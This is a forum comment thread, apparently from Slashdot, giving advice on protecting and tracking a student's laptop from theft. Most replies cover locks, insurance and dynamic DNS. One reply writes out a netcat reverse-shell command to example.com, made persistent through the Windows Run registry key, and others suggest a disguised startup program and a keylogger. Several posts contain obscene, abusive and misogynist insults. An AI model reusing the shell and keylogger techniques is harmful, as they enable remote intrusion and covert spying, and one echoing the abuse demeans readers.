So refusing to replace every toy your child loses/breaks is equivalent to beating them? It's a laptop, not food and board.

Re:So lemme get this straight.

[fjf33]

I don't think you've been to school lately. Without a computer you can't do much nowadays. If she lost a book for a class would you refuse her money and tell her to just fail it or make do? That is a milder example I guess. The previous poster radicalized the discussion that is why I exagerated. I think you missed the cinical tone.

Re:So lemme get this straight.

[pclminion]

I don't think you've been to school lately. Without a computer you can't do much nowadays.

You're right, it's been a few years. But even when I was there, they had these things called "computer labs." Are you saying these are now obsolete?

Re:So lemme get this straight.

[pclminion]

Jesus christ, How do you go from someone having something stolen (especially something as desirable and easy to take as an ipod) to someone who is so carteless that she'll go out and get pregnant by the first guy she lays eyes on. Where do you get off on insulting a parent like that, are you stupid or juat a misogynist bastard.

What I am is a fellow who was in college only three years ago. If you doubt the existence of predatory males who target naive females on college campuses, you have your head up your ass. I suppose you're a parent too, from the tone of your sentiment, and let me tell you... You are in for one BIG fucking surprise.

Re:So lemme get this straight.

[fjf33]

Pretty much. They are good for specialized software but they are usually over crowded. I used to work in one. Students would line up and printing was pretty horrendous. If you wanted to work on weekends...good luck. But there you had access to ProEngineer and other _very_ expensive software. Today I think they give you the CD and you install it in your machine and get a license from the server directly. Much cheaper than maintaining good, up to date computers with all the costs of licenses, etc. Who knows ... if she didn't need a laptop to begin with then it is not a necessity and she should buy it with her own money. I think that probably a desktop in the room would be better. At least she won't spend her money on drugs or alcohol.

Re:So lemme get this straight.

[a11]

he goes off insulting a parent like that because he feels like it - it's his post, don't read it if you don't want to. He likely made this long model-train-of-thought because he's an engineer like most of the smarter people in society are. It is a possibility and a hypothesis - based on valid data inputs and hence more likely than a random outcome.

Where do you get off using Jesus Christ in your pile of flame is offensive to me. Jesus and I used to be good friends. In fact, he used to be my copilot until I crashed the plane while he was sucking my dick. We were stranded on an iced mountain top for several months of hungry ass-sex but eventually I had to eat him. Fuck your whole extended family of retards, fuck your kids and your parents, fuck all your friends and coworkers, fuck your housepets, fuck your dishes, fuck your lawnmower, fuck the software you used to make this post, fuck your entire belief system, fuck your uid, fuck every post you've made here, and, of course, fuck you. Well, I brobably wouldn't want to fuck you, you disfigured fat sack of crap. go fuck yourself.

Not caring == effective backups

[dreamer-of-rules]

..and we have a winner!

The best bet is to avoid getting it stolen, not to try to recover it after the fact. If you care, personalize it a lot! Etch her full name into the cover, along with a message saying that it's stolen if not in her posession. Add a URL or phone number for anonymous tips. Maybe mention a reward. Make it value-less to steal.

You can get usable Windows laptops cheap. Just make sure that she has an effective backup solution. It would really suck losing a quarter's worth of homework and notes in the last week or so. She may also want to look into file encryption.

Of course, when it gets stolen, you can get her a Mac -- turn on FileVault, get .Mac for backups, be virus and spyware free, and get to setup secure guest logins for quick sharing with friends (in sight) without comprising data or security (much).

There have been well publicized theft recovery stories, a couple years ago, but thieves are learning to bypass those alarms. They avoid wireless networks while looking for incriminating documents, or just wipe/reinstall without booting up normally.

Stickers

[Bastian]

Seriously. If you don't have a need to worry about appearances (i.e., she's not taking it to corporate meetings), stickers (lots of them) go a long way. Thieves who aren't just stealing it for their own personal use will think twice about stealing anything that is easily identifiable because it would be easy to pick out at a pawn shop, and black-market type folks aren't going to want something that stands out so much. Thieves are generally looking for a quick buck, so they generally aren't going to be interested in scraping all those stickers off, either.

Also, in addition to writing down serial numbers, write down her MAC address (both the ethernet and the wireless if she has both). If it does get stolen, hand them off to the school's computer center. I know of two separate cases where students stole school computers, and were caught within a day the moment they plugged the thing into the network and turned it on. Hopefully they would be willing to do such a thing for your daughter in the event that such a thing happens.

But the single most important thing you can do is make sure that she locks her door and, if she has a ground floor room, keeps the windows closed when she's out. A lot of people I knew at college thought they didn't need to because folks around the dorm would keep an eye on things or something like that, but it just isn't true. There were several cases at my school (which only had 1,100 students) where someone from outside the college just walked into the dorms while classes were in session, tried doors, and walked out with the expensive stuff from the rooms with unlocked doors. If they walked in on someone, they would just make an excuse to the effect of, "Sorry, wrong room." And act like they were visiting someone and don't really know their way around very well yet.

And it's not exactly related to electronics, but, if she uses a purse, get her to quit. Otherwise, she's going to get sick of lugging it around at a party or while she's hunting for books at the library and she'll leave it next to the coat pile or in her study cubby, only to come back and find it gone.

Re:Stickers

Somebody tried to steal my laptop as it went through the xray machine at an airport (yep, really). He claimed he thought it was his. Ever since I've kept lots of sticker on it. It seemed like a good idea.

Then I used the laptop to give a presentation for a job interview last Friday. Suddenly the large Plain Lazy sticker across the lid didn't seem so smart!

offtopic?!

[corpsiclex]

Most of the posts I see so far are offtopic, insulting, and unhelpful. The guy asked for a tech solution, we're tech people! Help him out. I had a laptop stolen from my dorm a couple years ago, it sucked. I say just write a nice little program that hides itself and gives you a remote shell. Then have it 'phone home' just by updating its IP with a free dynamic dns service. When you need to get into the box, just ssh to the hostname. Call up the school and tell them the IP/MAC, and they will be able to help you if it is on the campus network. Avoid 'locking down' the box, as this will just encourage the theif to format the drive before you have a chance to find it (which he may do anyway). Perhaps other /.ers can elaborate. Good luck!

Re:offtopic?!

[tverbeek]

"You can't solve this problem with technology; here's how you have to do it," is a perfectly valid and helpful answer to, "What technology can I use to solve this problem?"

The Real Problem

[Dial-Up]

The problem isn't that she's toting around a piece of technology worth atleast $1000, or that she had her iPod stolen by some university student. It's not even that you bought her an iPod and a brand new laptop and then sent her off on her own. That is, with a credit card of course, because you never know when you might encounter a cute pair of shoes that you must have, oh and then that panda-skin purse to match. Wouldn't it just be easier to track her by her over-priced cell phone, or the RFID tags in her designer clothes?

The real problem is that she doesn't belong in university, but your wallet didn't understand that. $50,000 later, and a sudden switch of admissions officers, and you've just unloaded your snotty, 18-year-old mistake on someone else.

Re:The Real Problem

damn, dude, you need to have sex with a real, live human. that much anger is abnormal, and not at all constructive.

A couple of options....

[Kefaa]

Kim Komando has a reference to several companies that do what you ask.

Dear Kim: I bought my son a laptop. Is there a way it can be tracked if it is stolen?

Dear Reader: Yes. There is software that works over the Internet to report the location of a stolen laptop. When a thief connects the laptop to the Internet, the software reports its location to a special Web site. CyberAngel (www.sentryinc.com, $60 annually), CompuTracePlus (www.computrace. com, $50 annually) and zTrace (www. ztrace.com, $50 annually) are three companies that offer laptop locator software and services.

For MACs you might also try LapCop which emails you when the computer "disappears."

In addition, as literally anything could be on the drive, encrypt it. The translation slowdown will be barely noticeable and will save you if your child decided to put your VISA card in plain text files. Also, while a hardware password may seem like a great idea, if someone does steal the machine, it will never call home because they cannot get past the password.

I would then add a real easy to use laptop lock. If it is hard to use, it will not be used. No one wants to try and grab eight books from the library while lugging around their laptop. So they set it down for "just a minute."

Finally, for the "team her to be responsible" crowd: a college is about the least secure environment to which we will ever expose ourselves. People are free to come and go in most dorms, doors are secure as your least responsible roommate. College is also where more growing up occurs. Lighten up.

Re:A couple of options....

[Kefaa]

Here she has an update written this month on some other ideas for protecting a mobile machine.

Re:A couple of options....

[dalutong]

obviously more growing up occurs in college -- though i fear too much. not because growing up is bad, but because it indicates very little of it happened in high school.

i was dealt with a lot of reality in high school and before and benefited from it. i'm not saying force them to work all their freetime away -- but get them out of the circle of high school cliques and give them some freedom so they can start making responsible decisions and dealing with the consuqences so they aren't totally unprepared for the frat party drunkenness or seniors using every trick they know to get in their pants.

Re:A couple of options....

The "laptop locator" products are oriented for a corporate user who follows corporate rules. IMHO they are close to useless in an unsturctured environment. I had cyberangel on a personally-owned W2k machine that came with corporate-issued financial software. The "phone home" feature as implemented (Fall 2001) was annoying and obtrusive. It would hang the computer during its "silent phone home" routine. If I didn't plug in the modem on a daily basis (I got DSL after I got the laptop), I would get "missing laptop" inquiries because it couldn't phone home. It also required its password EVERYTIME the machine booted, so every software install required the cyberangel password to have it boot. Until I figured out how to remove the product (two .dll's), I had a sticker on the keyboard with the CA password on it.

Re:A couple of options....

[Insightfill]

Also: consider adding a limited user to the machine with a "null" password. A thief who tries to use the machine won't be able to use her account, but will be able to get in easily via the limited user. This way, not only is her stuff better protected if you use encryption (since the thief won't log in as her), but you'll have a very specific logon to put in all of the "phone home" action you want.

Also: consider installing a few apps like VNC, and dyndns on the box, making it easier to jump on it when you need to.

Re:A couple of options....

Yes and no. Depends on the environment.

A professional thief (or one who is tech savvy anyway) will reset the bios, pop in a boot CD to reformat and reinstall the OS, then use a fake mac before getting onto the network. NO software solution whatsoever will help in such cases.

Casual thieves aren't too much of a worry, if the campus network is willing to help track mac addresses.

Methods of deterrent work for both categories. Things like car alarms, home alarms, and the club are such devices. If you were a thief, would you rather steal a laptop with a biometric boot device that sounds an alarm on it, or steal a laptop that looks relatively unguarded (even if there are all sorts of software protections in it)? Heck, even a blinking LED might make someone think twice before stealing it.

Personal responsibility is a greater factor in preventing something from being solen than having deterrent devices. The devices have their uses (you can't watch over your car 24/7), but without personal responsibility, the deterrent devices are useless (forgetting to turn on the alarm, forgetting to lock the car, leaving the keys in the car, as an example). Even with the best devices, pickpockets can take small things like ipods straight out of a person's pocket even while they're listening to it if the person is unobservant or distracted.

You'd be surprised what doing the smallest things can do as a form of prevention. Keeping valuables hidden for example. Don't take out that laptop needlessly (e.g. to show off). Don't put the ipod down. Against thieves of a higher level, manners make a difference. Signs of nervousness are very easily read, and nervousness is a sign of value. Constantly touching a pocket might imply something important in there. On the other hand, putting a hand into the pocket and masking it as a look of style works the other way around. And maintaining a look of confidence and vigilance (but not arrogance) always helps.

You say college is where people grow up. The thing is, a lot of people don't understand the concept of personal responsibility even years after they've supposedly grown up. Besides, between her and her roommate, she could be the irresponsible one. Sometimes, a little teaching is required.

We're helping much more than you realize

Most of the posts I see so far are offtopic, insulting, and unhelpful. The guy asked for a tech solution, we're tech people! Help him out.

Yeah? Well, you're a stupid poopy-head who smells like an elephant's butt!

We know that he asked for a tech solution. What we're telling this guy is that there is a much bigger problem here than all those thieving college kids stealing a laptop. This guy can't see the forest for the trees. Christ, his daughter managed to lose an iPod after being on campus for three days and all this guy is worried about his a stupid laptop? This guy needs to get smacked upside the head with a clue-by-four.

We may not be nice but we're telling him what he needs to hear. We're "helping him out" more than you realize. He's had 18 years to instill some responsibility in his daughter and apparently hasn't done a very good job. This is probably his last chance. Fuck the stupid laptop, don't screw around with stupid geek tricks, and make one last attempt at preparing your daughter for the real world. What's at risk here is far more than a computer.

Yeah, but...

[daedalus-prime]

It would be pretty easy to add something that would "phone home" when the laptop booted, but it would also be very easy to defeat any such protection. If nothing else, re-installing Windows from a bootleg CD would wipe out most such protections.

One possibility that comes to mind would be to modify the BIOS to include the phone home feature. That way even if the thief (or recipient of the stolen goods) would have to know to re-flash the BIOS to eliminate your watchdog...

--DLM

Personalize the hell out of it

[Deagol]

I agree with the guy who said to personalize it.

Some people etch the VIN of their vehicle on every window.

I had a roomie in college who spray-painted his shiny new HP48-SX (circa 1991) flourescent safety orange. It looked god-awful, but I doubt anyone considered it a target. :)

Buy some 2nd-hand laptop and do a creative case mod on it. Wire her or initials in bright purple LEDs on the top cover or something. It'll stand out like a sore thumb, easy to spot if she's looking for it, and it'll be a bitch to fence to someone else.

Re:Personalize the hell out of it

[dj_virto]

Yeah! do a backlight mod that illuminates a photo of her behind plexiglas on the lid back. Wire up a series of LEDs that flash 'I HEART BEING HOT' beneath that. She'll be happy to keep it safe in her dorm room then maybe. :)

slow down people

[nuggetman]

What's all this poppycock about phone home software and remote logins and thin clients? This is rather simple...

1a. Buy a MicroSaver with guaranteed replacement from Kensington. As long as you file police report in X number of hours, Kensington will give you up to $1500 of the total cost if it was stolen while on the lock. Make sure she uses it. If it's on her desk, it's tethered.

1a corollary. When she's out, the dorm is locked.

1b. When it's not on her dorm desk, it is either in her hands, on a table or in front of her, or within arms reach. No exceptions. No "I just left it for a minute".

2. As another poster said, make it identifiable easily. Put a ton of stickers on it. Get your dremel out and carve in a name, address, phone number, and mention of reward.

3. Write down serial #s and MAC addresses, keep them on file. Report them to all the nessecary authorities if it's stolen. This includes the campus IT staff - when it comes to finding it by MAC address they can be your best friends. Unlike trying to trace an IP address over the net, they should be able to track the laptop to a physical location quickly if it's plugged into the campus network.

4. Backup. Backup. Backup. Nuff said.

5. If you're really paranoid, get a proximity alarm. Small device attaches to laptop, other device attaches to daughter. She goes too far, it goes off and draws attention.

Re:slow down people

A lot of times, companies require evidence, such as a piece of lock leftover. It has to be the LOCK that failed. This is true for motorcycle disc locks -- if there is no piece of a lock left, no payout.

Re:slow down people

[moonka]

Agreed. I have the exact same one, and it's pretty sturdy. Lived in the dorm for 2 years, and never had a problem because I always locked it up. I know for a fact that it has saved it at least once, because during finals this year, I locked it up at my table at the library, and went to grab a bite to eat from the downstairs (The girl next to us was supposed to watch it.) I come back, and she tells me that some guy walking by had grabbed my laptop, and the table shaking nudged her awake, the guy realized the labtop was locked to the table, and ran off.

Re:slow down people

[Trepalium]

All good advice, but I'd add one other:

If it's a big enough investment to get worried about it being stolen, insure it! It's usually fairly cheap to add it as a rider to your contents insurance on your house or apartment. I doubt it'll cost more than $30-$50/yr in most places, and if the thing is important to her school work why don't you have it now? Besides, at an average life of 5 to 6 years for a laptop, that's only $300. You can't even buy a new laptop for $300.

I'm not an insurance salesman, but I have had my laptop stolen before (at work, no less!). Having insured it, it let me get a new laptop, and put in extra money out of my own pocket to get a much nicer one than I had before (along with correcting mistakes I had made about the importance of screen size).

Re:slow down people

[TheMysteriousFuture]

On the subject of stickers...
http://www.stuffbak.com

They've got some interesting videos of people trying it out by 'losing' stuff and seeing what gets returned.

Re:slow down people

[eric2hill]

1b. When it's not on her dorm desk, it is either in her hands, on a table or in front of her, or within arms reach. No exceptions. No "I just left it for a minute".

I totally agree. Furthermore, make it EASY for her to do this. I bought an IBM X31 last year and it's a dream to carry - it suspends within just a second or two, resumes within 4 seconds or so, and is so light and compact that taking it with me "just for a minute" isn't a big deal.

My last laptop was a Dell C810. While being a great desktop replacement (15+ UXGA screen!) it absolutely SUCKED in the portability section. Lugging that behemoth around for "just a minute" and your daughter could be a professional weight-lifter.

Eric

Simple solution.

I'm guessing you bought her the iPod.

The easiest way to prevent such future mishaps is to make her buy her own laptop/PDA/MP3 player.

I assure you if she bought and paid for the stuff herself, the likelihood of them going missing will be much much lower.

MOD DOWN!

That's all well and good to teach your child to be responsible - but good luck having a college roommate who is also responsible.

This is not Insightful at all. Being responsible means taking non-optimal conditions into account. If you get your laptop stolen because your roomate leaves the door wide open, you don't throw up your hands and say "Hey, not my fault! There was nothing I could have done!"

Re:MOD DOWN!

[Mad_Rain]

Being responsible means taking non-optimal conditions into account. If you get your laptop stolen because your roomate leaves the door wide open, you don't throw up your hands and say "Hey, not my fault! There was nothing I could have done!"

You, AC, are an idiot and a troll. My point is that you need to have multiple levels of security in place, because there will come a time when you take "non-optimal conditions" into account, use good judgment, and you still won't have perfect security.

For example, the daughter in question could leave her laptop locked safely in her dormroom while she goes to the cafeteria; that's good, 'cause A) she won't need it while she's eating, B) one good spill could do a fair amount of damage, and C) her irresponsible roommate won't be back for another hour 'cause she has class.

Of course she was being reasonably responsible for her property, but when her roommate decides to skip class and leaves the room unlocked with the laptop in plain sight, it's going to get stolen regardless of her excellent responsibility. Again, having a solution to this possible problem is a good thing.

The daughter could keep her laptop on her at all times, and likewise with her other valuables, but at some point that level of paranoia impairs her ability to enjoy and experience life to the fullest.

Re:MOD DOWN!

[YomikoReadman]

Multiple layers of security is all well and good, but calling him a troll and an idiot for pointing out a major problem with your statement is downright moronic. If you have an idiotic, slacker roomate, then you need to be able/willing to go the extra mile to make sure that you're covered in the event the idiot, slacker roomate leaves the room unlocked, or door open, or what have you. As the AC pointed out, and rightfully so, part of being a functioning, responsible adult is taking less than optimal conditions into account.

Re:MOD DOWN!

[Mad_Rain]

If you have an idiotic, slacker roomate, then you need to be able/willing to go the extra mile to make sure that you're covered in the event the idiot, slacker roomate leaves the room unlocked, or door open, or what have you.

Well then, that person can definately go the extra mile and live like a sherpa, carrying everything they value on their back, because they don't trust anyone with their stuff. Or they can lock themselves in their room to keep an eye on everything, for the same reason. That level of dedication crosses a line from being "responsible" to "crazy". All I'm trying to say is that you need to find a balance between the two, which is why teaching her to be responsible is Step One, and Step Two is have a backup plan. When going that extra mile prevents you from living life, it's time to change directions and find a new way to go.

Re:MOD DOWN!

[YomikoReadman]

If it gets to be that bad, then you deal with that situation. However, we're not dicussing lugging around the contents of her room; we're talking about a 5-7 pound laptop computer that could quite easily be stowed in a backpack and carried around with ease.

Saying that I'm implying you need to 'live like a sherpa' is absolute crap; I'm not saying that at all. The same goes for locking oneself in their room.

Getting back to the subject at hand, having dealt with moronic, irresponsible college roomates, there are times when you simply need to buck up and keep a few of your more expensive electronic items, such as laptop, iPod or other such device, digital camera, etc on you while you deal with the irresponsible roomate by going to your RA or someone of that nature to get the problem dealt with. That's also a part of being responsible, by the way, since it seems to have not occured to you.

Ultimately, the point the AC was making, which I agree wholeheartedly on, is that having an upstanding responsible person to look after you is a luxury, and in a college environment, seems to be a great rarity. It's not something you count on, and certainly not a viable backup plan to being truly responsible and making a personal effort to secure your own valuables.

Re:MOD DOWN!

[Mad_Rain]

Did you read what I just said? Let me refresh your memory:

you need to find a balance between the two, which is why teaching her to be responsible is Step One, and Step Two is have a backup plan.

Yes, being responsible entails everything you mentioned. But being just being responsible for your property is not the end of the line - finding solutions and shooting down problems before/during/after they occur is necessary too.

Just google laptop protection

[diamondmagic]

No one has tried googling, for example, physical laptop protection?!?

The first few pages of results are very relevent to both preventing theft and recovering a laptop after it has been stolen.

Fine Print: Yah, i know it links to the google query 'laptop physical protection'. For some reason it provides better results.

The only real solution: incentives

[sakusha]

Make her pay for the laptop out of her own pocket. I guarantee she'll take a LOT better care of it if it's HER money that paid for it.

Re:The only real solution: incentives

This is about the most intelligent post in this whole topic. I'm sure if she had to earn the money to buy the laptop in the first place, she'd definately take much better care of it. And she'd get a valuable lesson in the value of a dollar, too.

Passwords...

Make sure there is a password on the HDD and BIOS... yeah it is a pain to type in two passwords to start the computer, but it takes like 10 seconds.

Will you all quit blaming his daughter for losing an iPod... yes, you have to be careful with stuff, but theft should be blamed on THIEVES/criminals, not the victim.

Locks

[AuMatar]

Make sure she always locks her door. Buy her a dockign station with a physical lock for when she's leaving it in the dorm. That and not being stupid and leaving it anywhere is about all she needs.

dyndns!

[mnmn]

Its free and its for directing a domain name to your changing IP address. Several clients are available for XP... and its only too easy to download, install and setup.

Come to think of it, the campus should keep a list of all known MAC addresses, and they can then trace a stolen one REAL fast to the dorm or library. This is re-install proof, and only a smart thief could force on a new MAC address on the thing.

Even better, put some radioactive material on your daughters laptop and walk around with a geiger counter when its stolen.

And I'm kidding too...

Lock the BIOS boot up order.

[WoTG]

This thread got me thinking about how to (try) to get the thief to boot the PC so that you have a chance of tracing it. Most pro's would probably avoid booting from the hard drive and boot from a CD to format the drive. If you lock the boot order to boot from HD first, you would get a _slightly_ better chance of recovery - particularly w/integrated WiFi. Though, the real pro's would probably take the HD out and reformat on another machine...

*Not* a real problem...

[pla]

You have access to a website, including its logs?

Pick a fictional page. Any page. Set up a cron job/scheduled task to wget that page every hour.

There ya go. You have an hourly log of the laptop's IP address, along with (possibly) a referrer, a user agent (probably whater it has on it now), and if you go all out, you can make the request encode just about as much info as you want (last few files opened? Last email sent? Address book?).


As an aside, I've submitted a hell of a lot better Ask Slashdots, and gotten rejected. Who's sister did you marry?

Not bitter... Just find this one as close to "trivial" as we can get. What next, "I told netscape to make an image my background, how do I put it back to the fishies?"

Virgin Alarm

[kmahan]

What you need is the Virgin Alarm from SpaceBalls.

Lone Star: What the hell was that noise?
Dot Matrix: That was my virgin-alarm. It's programmed to go off before you do!

CMOS

[Sir+Pallas]

Every laptop I've ever had has a CMOS battery in it. I've even pulled a couple of them out when the BIOS froze. (Don't tell Compaq!)

Don't give her a computer. End of story.

[technoextreme]

Im an engineering student and it is entirely possible to get through the first year without a computer. People always looked at me like I was crazy when I told them I didn't get a computer. I didn't need to. My university had a huge computer lab filled with both Apple and PC computers. Every program I needed was installed and all I had to do was walk to the library. I could have done pretty much anything with those computers.

Re:Don't give her a computer. End of story.

[supertoad]

exactly the advice i was going to give. i got through first year computer science with no computer for most of the year. bought a desktop a couple months ago, but you really don't need a laptop. If she really wants one, make her buy it herself, she will damn sure not get it stolen then

keep in mind...

[imsmith]

that universities often NAT their network, and the most likely thief is another student, so if you do have it 'phoning home' you need to capture the local LAN IP address and package it up to actually send to the log server, not just ping the server and record the origin of the ping.

Make sure her roommate...

...has an Apple laptop. Then the thieves will take that and leave her POS Windows laptop alone.

Laptop Protection

[Deathlizard]

OK. This is from someone who's main job is to repair Laptops in a College Student Laptop Program. I won't say which college because I like to keep my job separated from myself, but we deal with 1000 laptops and just had to deal with this last week.

First off, Laptop locks are useless. I can pick most of them in less than 2 minutes, and can crack most of the combination locks in about the same time. Now imagine a pro doing it. Also in most cases, They'll just break the laptop case to get it off the lock. You would be surprised what little most laptop lock points are protected with. Also, don't expect the campus police to be much help. In many cases they will do a write up and that's it, So don't expect CSI to show up if it's stolen.

Second, If the college your daughter is going to has some sort of Insurance on anything stolen in the Residence hall, Get it. Period. If it does happen you can at least claim the laptop back. I honestly forgot the name of the policy we were giving out to students, but it protected just about anything in the room from just about any major incident, from stolen property to fire.

Finally, if it is a brand name laptop, and your more concerned about the data rather than cost, call up the manufacturer and see if they offer some sort of phone home capability. IBM (since this is the laptop we give to students) I know offers it for a price but to us it's not cost effective to get Vs the amount of stolen laptops we have. Other colleges we have talked to swear by it. I'm not too sure about Dell or other manufactures but I believe that they have some sort of Equivalent. Also make periodic backups of her data (or have her store important files on a Network drive if available) and bios password protect it from Hard Drive Access. The first thing a professional thief is going to do is wipe the drive since it could point back to the person it was stolen from.

Re:Laptop Protection

[phillymjs]

First off, Laptop locks are useless. I can pick most of them in less than 2 minutes, and can crack most of the combination locks in about the same time. Now imagine a pro doing it. Also in most cases, They'll just break the laptop case to get it off the lock. You would be surprised what little most laptop lock points are protected with.

Laptop locks are not supposed to stand up to much abuse. They are just a deterrent to casual theft. If there's a locked laptop and an unlocked laptop sitting unattended momentarily, right next to each other on a library table, guess which one is more likely get slipped into some dude's bookbag in a crime of opportunity?

Laptop lock points are not supposed to stand up to much abuse. They are supposed to break, thereby creating cosmetic damage that will (theoretically) negatively affect the resale value and also fairly scream "Hey, look at me! I'm a stolen laptop!" It would be better IMHO if breaking the lock off rendered the laptop inoperable, but that would result in too many laptops killed accidentally by their klutzy owners. And even if it takes two minutes to pick the lock, that's two minutes during which the thief could get caught in the act, so he likely won't risk it.

My point is, some protection is always better than none, especially if there are other people around who don't use any-- they'll be victimized first.

Here's a real-life example of that: When I was a kid, me and my friend got our bikes stolen from in front of a store we had gone into for a few minutes. They didn't have a bike rack out front, but before we went in, I took the time to at least run my chain through the rear wheel and lock it. My friend didn't. The thief couldn't ride my bike with the wheel bound up, and he apparently got tired of dragging it. He left it behind some stores across the street, and I had it back less than 10 minutes later. My friend never saw his again.

~Philly

Lay Off Dude

Just because you got flamed because of your infamous 'Ask Slashdot: Should I build a Windows 2000 or Windows XP Box?' submission doesn't mean you have to take it out on other people!

Ok, here's what I'd do...

[crazyphilman]

First, I'd try to find a programmer, because this is going to take a little bit of coding. I'm going to give you a sort of spec; you can hire a starving college kid to hook this up for you on the cheap. OK? Here goes:

1. Locate a simple, downloadable SMTP library. You want this to be something that can be used within a piece of software to generate and send an email. VB, for example, has a Sendmail.dll file you can download somewhere, with a simple interface for creating and sending email. It's worth googling for (I don't remember it offhand).

2. Have your coder write some code that gets back the results of ipconfig (is it still called ipconfig on XP? I think that's the one for Windows 2000) and stuffs it in the body of an email. That'll give you what you need. Make sure the email also contains a timestamp, because you'll want to see who had that IP address at that time.

3. If you want to get really fancy, you can have your developer use whois (if the system has that; have to check) to find out who owns the subnet the laptop is on. That'll tell you whether its her university or a private ISP. If you can find a whois server on the web that'll let you do an automated check, that'll work too, just open a brief http connection. Netsol won't do it; they make you enter text from an image every time. Grumble...

4. You want the program to run very quietly without output on startup. You'll want to call it something innocuous, like SYSverCHK.exe, something people will figure is system related.

That's all I can think of off the top of my head... Good luck!

Re:Ok, here's what I'd do...

[gatkinso]

whip up a keylogger and send that home too. Encrypt it, and give your daughter the password if she is worried about being spied on.

Things get stolen all the time

[Odocoileus]

That is what insurance is for.

http://laplocker.com

[zeenixus]

i ran across these guys http://laplocker.com/ on the mac hardware site a week or two ago. supposedly, you can lock a laptop down with it without having to drill holes and such.

they're supposed to have an ipod version in the works too.

Although, i'm not sure I'm looking forward to their 'chastity' line of products. :o

mod parent up!

mod parent up!!

He speaks sense. if there's a logon password, on goes the pirate copy of XP.

Simple script

[Digital+Dharma]

Copied from technet:

Set objEmail = CreateObject("CDO.Message")

objEmail.From = "admin1@fabrikam.com"
objEmail.To = "admin2@fabrikam.com"
objEmail.Subject = "Server down"
objEmail.Textbody = "Server1 is no longer accessible over the network."
objEmail.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/s endusing") = 2
objEmail.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/s mtpserver") = _
"smarthost"
objEmail.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/s mtpserverport") = 25
objEmail.Configuration.Fields.Update
objEmail .Send

www.mobilesafeinc.com

[Gen.+Rasputin+X]

I bought a lockbox from these guys, and a couple of mounting plates. It solved my laptop problems. I've carried a few grand in it before and had no concerns about it. http://www.mobilesafeinc.com/

Uhm...netcat?

If you're gonna monitor it from a webserver log, why not just install netcat, make batch file, and run the batch from
HKLM\Software\Microsoft\Windows\CurrentVersion\R un

Something like: nc -d example.com 80

Or better yet, make a VBS script:

Set WSHShell = Script.CreateObject("WScript.Shell")
while a < 5
WshShell.Run("c:\nc.exe -d -e cmd example.com PortNumberHere"),0,TRUE
wend

Passwords don't help.

[Some+Random+Username]

Laptops do have CMOS batteries, some are hidden away, but they are there. And thieves can just chuck the hard drive and put in a new one, this doesn't deter theft at all. There's more effort involved in stealing the laptop than getting it ready to sell.

protection

It sounds like a box of condoms might be a better investment. But then again if she is drunk that might not even help.

staticcling.org

[mattr]

Here's another thing you could add. Go to staticcling.org and get a free domain name for the machine. Install a script to run the updater every day, it will work up to a month offline. This will register the current IP address of the machine to a dynamic IP provider and if you had a GPS in it you could even find the machine.. or get a photo of the user from the webcam maybe. Or erase everything remotely over vnc, etc.

Re:staticcling.org

[Zimok]

I was just thinking of making a post to mention GPS.. but you beat me to it, this is the best idea.

re: bios passwd

[pbhj]

Bios password isn't got to stop the theft, it's going to stop the laptop being used afterwards ... until they hard-reset the bios. It might work against you as it might result in the laptop being trashed. If it's used then you at least have a chance to catch the culprit(s).

If you want to discourage theft I reckon the grunge look (ie case mod it to hell, as others suggest) is the only way.

If you want to inhibit theft a cable lock is a good idea.

If you want to reduce financial loss then get insurance.

If you want to reduce data loss, get backing up.

Re: bios passwd

[SteveAyre]

Once trick I have for my own laptop is I carry it around in a bag that doesn't look like a laptop bag.

Putting it in a laptop bag is equivalent wearing a neon sign that says "I have a laptop. Please steal it." Especially if it has the manufacturer on the site just to clear any doubts any potential thief has about the contents.

Some better ideas are:
- Get a briefcase and fill it with foam padding
- There are laptop rucksacks you can get, which are less obvious

Phoning home - one way to do it

[Swedey]

Besides keeping track of the MAC address (probably the best idea along with "personalizing" the laptop to reduce the chance it'll be a target), if you also want to know the current/last IP address a machine had, you can silently run a dynamic DNS client and let it check and update its IP address with a dynamic DNS service such as zoneedit.com or dyndns.org (there are others).

Basically, you go to one of those sites first. Let's say we want to use dyndns.org. You pick a name for the machine such as mydaughter.dyndns.org and sign up.

Then on the machine, you set up a dynamic dns client to keep running in the background. Look here for some possible client programs: http://www.dyndns.org/support/clients/

Have the software check its IP address at startup and at regular intervals. (Just don't pound the dynamic DNS service with updates that are too frequent; they don't like that. Read their policy for how frequent is considered too frequent. Most seem to be okay with checking your IP every 5 minutes.)

When an IP address change is detected, your program client "phones home" to dyndns.org to report its new IP address.

If the unthinkable happens, then: Simply log into your account at dyndns.org to find out when the last IP address change was, and what the last IP was. Then go to samspade.org or a comparable site where you can run a WhoIS query on that IP address to find out what network the machine is/was connected to, and the contact information for that ISP/network.

If the machine's on the campus network, call up the campus's IT people and give them the MAC address. If the machine's on another ISP, at least you probably now have that ISP's contact information and you can pass along the MAC address and IP address (with the time of the last IP update) to that ISP (and hope they'll cooperate with you and the police.)

Make sure your daughter understands what the program is and understands not to remove the program. And make sure she's okay with this whole thing and doesn't see it as micromanaging.

This "phoning home" idea really only goes so far, so consider the rest of the good advice as well.

Re: bios passwd

[Metasquares]

You can always buy one of these (as seen on Slashdot!)

Does she really need a laptop?

[lupinstel]

Just get some shitty beige box tower, and put good parts in it. It will look like crap so no one will want it, and it would be too big to take anyway. A laptop may be handy, but college is not to the point where a laptop is required just to take notes in class. After a while she will get sick of carrying it around and booting it up, and it will just get left in her room anyway.

An Interesting Fortune.

[themassiah]

An interesting fortune from Slashdot at the bottom of my page in this story:

"A girl's conscience doesn't really keep her from doing anything wrong-- it merely keeps her from enjoying it. "

Just seen on Engadget

[Burianski11]

LoJack for Laptops

Stealing information

[phorm]

Not entirely true. Some of the people who steal laptops often find that stealing information (such as saved passwords/etc for banking info, financial spreadsheets, etc) can be more profitable than stealing the laptop itself.

Of course, they can initially unplug the ethernet... but if you were to leave a desktop link that said "banking and financials" which actually linked to an IP-logging website, you might be good. Or perhaps a Dial-up-network connection for "banking" that called your cellphone (then you can get the caller through call-ID).

And as far as logging an IP address from MSN... how did you manage that, since traffic is routed through the MSN server...?

Obligatory reference...

Surviving College With Gear And Sanity Intact?

Re: bios passwd

[tonsofpcs]

That's worse, then the would-be computer theif will see the pizza, want some, open it, see the computer, and take it in the pizza box, and no one will even see him/her taking the computer.

Going About It The Wrong Way

[B11]

